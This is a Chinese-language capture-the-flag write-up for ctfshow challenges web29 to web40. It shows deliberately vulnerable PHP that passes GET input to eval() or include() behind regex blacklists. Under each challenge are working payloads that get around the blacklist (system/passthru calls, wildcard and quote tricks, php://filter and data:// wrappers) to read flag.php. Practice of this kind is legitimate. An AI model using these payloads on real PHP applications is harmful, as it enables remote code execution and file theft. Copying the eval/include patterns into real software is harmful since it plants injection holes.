曲曲折折的路总有它的道理 只希望最后一页是花开万里。
web29
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
过滤了flag整体大小写
preg_match("/flag/i", $c)
?c=system("ls");
可以看到flag
只需绕过flag即可
?c=system("cat f*");
?c=system("cat fla''g.php");
?c=system("cat fla?.php");?c=system("cat fla?.php");
?c=system("nl fla?.php");
?c=system("tac fla?.php");?c=passthru("cat%20f*");
也可以
payload1:c=system("nl fla?????");
payload2:c=system("nl fla*");
payload3:c=echo `nl fl''ag.php`;或者c=echo `nl fl“”ag.php`;或c=system('nl fl""ag.php');
payload4:c=echo `nl fl\ag.php`;//转义字符绕过
payload5:c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
payload6:c=eval($_GET[1]);&1=system('nl flag.php');或c=include($_GET[1]);&1=system("cat flag.php")payload7:c=`cp f???.??? 123.txt`;//然后查看123.txt即可
web30
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
过滤了flag,system,php
这些函数都是一个效果
system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
反引号 同shell_exec()//``
依然可以用
payload:c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
payload:c=`cp f???.??? 123.txt`;//然后查看123.txt即可
payload:c=echo `nl f*`;或 c=echo `cat f*`;或 c=echo `tac f*`;
payload:c=passthru("cat%20f*");
payload:c=passthru("cat%20fl''ag.ph''p");
payload:c=passthru("cat%20fl\ag.ph\p");
web31
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
题目过滤了flag,system,php,cat,sort,shell,点号,空格,单引号
思考:cat不能用可以用tac,nl,空格可以用%09代替,system可以用passthru替代
payload:c=passthru("tac%09f*");
也可以用
payload:c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
payload:c=echo%09`nl%09f*`;或 c=echo%09`tac%09f*`;
payload:c=eval($_GET[1]);&1=system('nl flag.php');
web32
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
过滤了flag,system,php,cat,sort,shell,点号,空格,单引号,反引号,echo,分号,括号
思考:过滤了折磨多。。。参考一下?c=include$_GET["1"];&1=s.base64-encode/resource=flag.php
只需将;替换成?>
payload:?c=include$_GET["1"]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
web33
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
过滤了flag,system,php,cat,sort,shell,点号,,空格,单引号,反引号,echo,分号,括号,双引号。
思考:比上题多过滤了双引号,也可以参考上题的payload:c=include$_GET["1"]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
[]里的如果是单字符可以去掉""
payload:c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
web34
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
过滤了flag,system,php,cat,sort,shell,点号,,空格,单引号,反引号,echo,分号,括号,冒号,双引号。
就多增加了冒号,可以用上一题的payload
payload:c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
web35
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
过滤了flag,system,php,cat,sort,shell,点号,,空格,单引号,反引号,echo,分号,括号,冒号,双引号,<,等于号。
多增加了>,和等于号,仍可以使用上一题的payload
payload:c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
web36
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:16
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
过滤了flag,system,php,cat,sort,shell,点号,,空格,单引号,反引号,echo,分号,括号,冒号,双引号,<,等于号,/,数字0-9。
增加了/,数字0-9,仍然借鉴上一题的payload:c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
把1换成a即可
payload:c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
web37
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
代码中将$c用include包裹了起来,需要用到php的伪协议,这里可以使用data的伪协议
data://
同样类似与php://input,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。从而导致任意代码执行。
payload1:c=data://text/plain,<?php%20system("cat%20f*");?>
payload2:c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==// base64,解密后为<?php%20system("cat%20f*");?>
web38
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|php|file/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
过滤了flag,php,file。
依可以用上一题的payload
payload:c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==// base64,解密后为<?php%20system("cat%20f*");?>
web39
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c.".php");
}
}else{
highlight_file(__FILE__);
}
这题输入的c被强制加了.php后缀
但是data中的<?是闭合的所以后面的.php没有用
仍可以使用37题的payload
payload:c=data://text/plain,<?php%20system("cat%20f*");?>
web40
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:03:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
题目过滤了各种符号,但是正则中过滤了中文的括号,不是英文的.
所以我们可以用无参数文件读取:无参数读文件和RCE总结 - FreeBuf网络安全行业门户
构造payload:c=show_source(next(array_reverse(scandir(getcwd()))));